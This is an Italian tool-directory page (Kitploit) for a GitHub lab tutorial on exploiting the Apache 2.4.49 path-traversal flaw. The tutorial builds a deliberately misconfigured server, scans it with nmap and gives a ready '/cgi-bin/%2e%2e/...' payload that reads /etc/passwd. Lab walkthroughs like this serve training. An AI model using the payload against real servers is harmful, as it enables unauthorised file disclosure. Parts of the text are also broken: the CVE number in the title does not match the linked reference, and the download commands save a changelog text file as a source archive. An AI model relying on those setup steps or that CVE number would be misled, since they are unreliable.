Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
CVE-2021-4773 — questo è un esempio pratico di come sfruttare la vulnerabilità CVE-2021-4773 con una macchina virtuale | Kitploit
Strumenti/GitHubGitHub/alexs18/cve-2021-4773
Analisi delle VulnerabilitàExploitSfruttamento di Applicazioni WebPenetration TestingApprendimento e FormazioneLab e Pratica
GitHubalexs18/cve-2021-4773

CVE-2021-4773

questo è un esempio pratico di come sfruttare la vulnerabilità CVE-2021-4773 con una macchina virtuale

Vedi Repository
9 mesi faNon ancora revisionato

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi

CVE-2021-4773

questo è un esempio pratico di come sfruttare la vulnerabilità CVE-2021-4773 con una macchina virtuale

per questo tutorial hai bisogno di:

  • macchina virtuale come Kali Linux
  • macchina virtuale come Ubuntu Server
  • installare Apache versione 2.4.49

quindi iniziamo quando hai due macchine virtuali in esecuzione, installerai Apache versione 2.4.49 da un repository di archivio puoi trovare la versione a questo indirizzo: https://archive.apache.org/dist/httpd/CHANGES_2.4.49

Installa e configura la versione vulnerabile su Ubuntu Server

1 La prima volta nella tua macchina virtuale server devi eseguire il seguente comando:

root@kitploit:~
curl -k -L -s --compressed https://archive.apache.org/dist/httpd/CHANGES_2.4.49 > httpd-2.4.49.tar.bz2  or wget https://archive.apache.org/dist/httpd/CHANGES_2.4.49 > httpd-2.4.49.tar.bz2 

2 La seconda volta devi decomprimere questa versione di Apache in questo modo:

root@kitploit:~
tar -xvjf httpd-2.4.49.tar.bz2

3 Installa i seguenti pacchetti:

root@kitploit:~
sudo apt install build-essential libpcre3 libpcre3-dev libapr1-dev libaprutil1-dev libssl-dev

4 Esegui il file eseguibile nella directory principale (file chiamato configure) usando il flag per specificare la directory di installazione:

root@kitploit:~
./configure --prefix=/usr/local/apache2

5 Compila la versione vulnerabile:

root@kitploit:~
make

6 Installa la versione vulnerabile:

root@kitploit:~
make install

7 Verifica la versione:

root@kitploit:~
ls /usr/local/apache2

8 Avvia il processo:

root@kitploit:~
/usr/local/apache2/bin/apachectl start

9 Verifica il processo:

root@kitploit:~
ps aux | grep httpd

10 Configura la vulnerabilità: Trova il file /usr/local/apache2/conf/httpd.conf e configura la directory admin Trova il tag Directory e cambia Require all denied in

root@kitploit:~
  Require all granted
  

Trova il tag Files .ht* e cambia Require all denied in

root@kitploit:~
  Require all granted

Il primo cambiamento serve per sfruttare la vulnerabilità nell'ambiente locale, il secondo per l'esposizione nell'ambiente reale

Sfruttare la vulnerabilità su Kali Linux

1 Scansiona l'indirizzo IP con nmap usando il seguente comando:

root@kitploit:~
nmap -sV ip_address

2 Esegui un curl o wget per testare il server Apache:

root@kitploit:~
curl ip_address or make wget ip_address

3 Consulta come sfruttare la vulnerabilità nella pagina seguente se vuoi capire la sintassi:

root@kitploit:~
https://www.picussecurity.com/resource/blog/simulate-apache-cve-2021-41773-exploits-vulnerability

oppure usa direttamente il seguente payload:

root@kitploit:~
http://$host/cgi-bin/%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd
Scarica lo strumento